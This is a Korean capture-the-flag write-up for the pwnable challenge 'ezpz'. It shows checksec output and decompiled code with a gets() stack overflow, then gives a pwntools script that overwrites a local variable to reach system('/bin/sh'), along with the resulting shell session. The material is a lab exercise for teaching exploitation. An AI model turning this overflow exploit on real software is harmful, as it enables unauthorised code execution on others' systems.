[CTF@CIT] ezpz

보호 기법

❯ checksec ezpz
[*] '/root/workspace/ctf/CTF@CIT_2024/pwnable/ezpz/ezpz'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments

• 아무 보호 기법도 걸려있지 않습니다.

문제 코드

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  char v5[72]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int64 v6; // [rsp+48h] [rbp-8h]

  v3 = time(0LL);
  srand(v3);
  v6 = rand() % 5uLL;
  setbuf(_bss_start, 0LL);
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  puts("\x1B[32m~ authored by nop.so (https://nop.so/) ~\x1B[0m\n\n");
  puts((&pwn_pep_talk)[v6]);
  puts("\n");
  puts("i'm so tired of pwning and pwning all these insecure binaries.");
  puts("could you write me something to put the pep back in my step so");
  puts("I can pop some shells and make nop.so proud?");
  gets(v5);
  puts("\nthank you. I will cherish this.\n");
  if ( v6 == -1LL )
    system("/bin/sh");
  return 0;
}

• gets 함수로 인해 BOF 취약점이 발생합니다.
• v6 값이 -1 이면 system("/bin/sh") 가 실행됩니다.
• BOF 취약점을 이용해서 v6 값을 -1 로 조작하면 쉘을 딸 수 있습니다.

익스플로잇 코드

from pwn import *

binary = "./ezpz"
p = process(binary)

payload = b'A' * 72
payload += p64(0xffffffffffffffff)

p.sendlineafter("I can pop some shells and make nop.so proud?", payload)

p.interactive()

익스플로잇

❯ python3 exploit.py 2> /dev/null
[+] Starting local process './ezpz': pid 4791
[*] Switching to interactive mode


thank you. I will cherish this.

$ ls
exploit.py  ezpz  ezpz.id0  ezpz.id1  ezpz.id2    ezpz.nam  ezpz.til  remote.py